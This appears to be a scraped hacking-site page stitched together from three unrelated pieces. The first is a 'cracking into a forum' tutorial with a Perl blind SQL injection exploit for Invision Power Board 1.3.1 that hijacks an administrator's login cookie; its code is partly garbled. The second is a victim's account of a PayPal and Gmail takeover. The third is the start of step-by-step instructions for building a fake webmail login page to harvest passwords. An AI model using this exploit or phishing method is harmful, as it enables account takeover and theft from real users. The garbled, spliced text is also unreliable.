I call it “Cracking into a forum” … Learn what hacking means you, lol…

PS: I am hacking a forum slowly, everything i am doing now, is posted here by steps :

First of all, what you need is a forum to hack. For the sake of this tutorial, and for the safety of a specific site, I will not release the URL of the site that I will be hacking in this. I will be refering to it as “hackingsite”.

So you’ve got your target. You know the forum to want to hack, but how? Let’s find the user we want to hack. Typically, you’d want to hack the admin. The administrator is usually the first member, therefore his/her User ID will be “1″. Find the User ID of the administrator, or person you wish to hack. For this tutorial, let’s say his/her ID is “2″.

Got it? Well, now we are almost all set. So far, we know the site we wish to hack, and the member we wish to hack. In this case, we are hacking the administrator of “hackingsite”, which is User ID “2″.

Now we need a nice exploit. I preferably, for 1.3.1 forums, use one that is in common circulation around these forums. For those who don’t have it, here:

CODE
#!/usr/bin/perl -w
##################################################################
# This one actually works Just paste the outputted cookie into
# your request header using livehttpheaders or something and you
# will probably be logged in as that user. No need to decrypt it!
# Exploit coded by “ReMuSOMeGa & Nova” and http://remusomega.com
##################################################################

use LWP::UserAgent;

$ua = new LWP::UserAgent;
$ua->agent(”Mosiac 1.0″ . $ua->agent);

if (!$ARGV[0]) {$ARGV[0] = ”;}
if (!$ARGV[3]) {$ARGV[3] = ”;}

my $path = $ARGV[0] . ‘/index.php?act=Login&CODE=autologin’;
my $user = $ARGV[1]; # userid to jack
my $iver = $ARGV[2]; # version 1 or 2
my $cpre = $ARGV[3]; # cookie prefix
my $dbug = $ARGV[4]; # debug?

if (!$ARGV[2])
{
print “..By ReMuSoMeGa & Nova. Usage: ipb.pl http://forums.site.org [id] [ver 1/2].\n\n”;
exit;
}

my @charset = (”0″,”1″,”2″,”3″,”4″,”5″,”6″,”7″,”8″,”9″,”a”,”b”,”c”,”d”,”e”,”f”);

my $outputs = ”;

for( $i=1; $i < j=”0;” current =” $charset[$j];” sql =” (” cookie =” (’Cookie’”> $cpre . “member_id=31337420; ” . $cpre . “pass_hash=” . $sql);
my $res = $ua->get($path, @cookie);

# If we get a valid sql request then this
# does not appear anywhere in the sources
$pattern = ”;

$_ = $res->content;

if ($dbug) { print };

if ( !(/$pattern/) )
{
$outputs .= $current;
print “$current\n”;
last;
}

}
if ( length($outputs) < member_id=” . $user . ” pass_hash=””>

What the fuck,Pretty confused, aren’t you? What the fuck are you supposed to do with this shit?! I’ll tell you. First of all, this is a Perl script.

Source: http://www.hungry-hackers.com/

Day 1 – 8.30 PM IST

I just logged in into my gmail account to check the emails, I was shocked to see 4 emails from PayPal. 1. Password Changed, 2. Payment sent to some email address 3. Bank accounts removed 4. Primary email address changed. Oh my God!, I had $X,XXX in PayPal balance. While I was seeing these emails my gmail also got logged out. When I tried to login again, it did not. The hacker watched my every move. My primary email ID was the one which I used for all my business and personal contacts and it had 14000 archived emails and chat conversations.

I was feeling like blindfolded and left in a unknown forest. I just could not believe that this had happened to me. I had Norton anti virus + norton internet security and Spyware doctor, both of them licensed versions!! I know all about fake emails and phishing stuffs, I never clicked on suspicious links.

I realized that… “You are safe only if no one targets to attack you.”

After a few minutes, someone added me to Yahoo messenger and said ‘Hi’. I guessed that it was the hacker and it was. The very first sentence he told me was ‘Hi, don’t worry, you will get back everything within 7 days’ .. He told me that he was a good guy and this is the first time he hacked someone. He also told me that he was in real need of the funds and would return my funds within 7 days. I almost believed him. I told him to give back my gmail account and told him that it was very important to me, and to my surprise he gave it back. He asked me what password I needed for the new account and he set it. I logged in and changed the password again. I was happy that I got back my gmail but was still very uncomfortable about the feeling that someone had watched me for so long!!

I was late in the night, I was sleepy but I had to hold on. I backed up all my files in my iPod and did a system recovery. After 45 minutes, my PC was as good as new. I again changed all the passwords and got back to sleep at midnight.

Day 2 – 6.00 AM IST

I saw my friend was online. I chatted with him and told him the entire story. He scolded me that I have not responded in timely fashion. He was so sure that the hacker was no good and chatted with me to make sure I don’t call PayPal. The hacker did not achieve that but however he delayed me by 10 hours. I spent nearly 30 minutes waiting for PayPal representative and then some one showed up. I told PayPal, the entire story and they listened carefully. They assured me that ‘I will not be held responsible for unauthorized payments sent from my account’. I felt good but not very good, I was not so sure that I would get back the money. I did what I could have done and I needed to relax. I took rest from this issue.

Day 3 – 7 PM EST

I called PayPal again. It needs a ton of patience to get connected with them. It took a few minutes to spot my account. They told me that “Your fraudulent payments were reversed, did you check your account”. I just jumped right there and was so happy. But I COULD NOT LOGIN into my PayPal because the password was not with me!

I was not able to reset my password because the hacker also changed the security questions! They advised me to send all the documents and they will help to recover the password.

After a few minutes the hacker came online again. And LOL what nerves he got!!.. He asked me to send the documents to him because he said my account got limited and needs to be unlocked!! I refrained myself from talking abusive words and just managed the situation and logged out.

Day 4 – 6 PM EST

I logged in into yahoo messenger and I saw that the hacker had left me an offline message. Wow! he got frustrated I guess. He left me the PayPal email and password. I logged in and viola! I went inside my PP. Lovely moment it was.. The balance was intact. The four fraudulent payments were reversed. The account was limited though. I just printed the fax cover sheet and sent them the docs.

Day 4 – 3 PM IST

I got an email that my PayPal account has been restored. I immediately went in and sent 4 big payments to my friends and family members. I could breathe now again!

Now whats next?.. everything is back to square one! Now that I have learnt a good lesson. If we think something like “This can never happen to me” you actually attract that situation and within a few days you realize it… the dream comes true.. even though its a bad dream in this case.

I contacted me friends and everyone told me that I need to kick out Norton and Spyware Doctor and buy Kaspersky because thats what is best in the market. I went to that site and reviewed their products. They had anti virus and Internet Security 7.0. The anti virus comes inbuilt within Internet Security and hence its enough to buy the latter one. For one year it costs around $60 and for 2 years its around $95. I just bought it right away and installed it, activated it. Again I changed all my important passwords.

Bottom line: If you think it wont happen to you, one day it will happen, and you will think about the day when you thought that it won’t happen to you.

Now that I got my money back, but it may not happen all the time to all the people. You just need to be on top of it.

Good Luck!

By Karthik Arun
http://ezinearticles.com/

Now follow the following steps :

1. Open the website of HotMail or GMail or YahooMail, its your wish. If you want to HACK yahoo id, then goto www.yahoomail.com
2. Now press “CTRL+U”, you will get the source code of yahoo page. NOw press “CTRL+A” copy all the text.
3. Open NOTEPAD, now paste it here. SAVE it as YAHOOFAKE.HTML
4. Now open the the file yahoofake.html using noepad, here you ll find a code which starts with <form method=”post” action=”https://login.yahoo.com/config/login?” autocomplete=”off” name=”login_form”> ( This code is for Yahoo. For any other site this code will be different but you need to find the code starting with (form method=”post” action=”xxxxxxxxxxxxx”))
5. Now in place of (form method=”post” action=”xxxxxxxxxxxxx”)
   
   put the following code after placing your form id:

Source: http://www.hungry-hackers.com/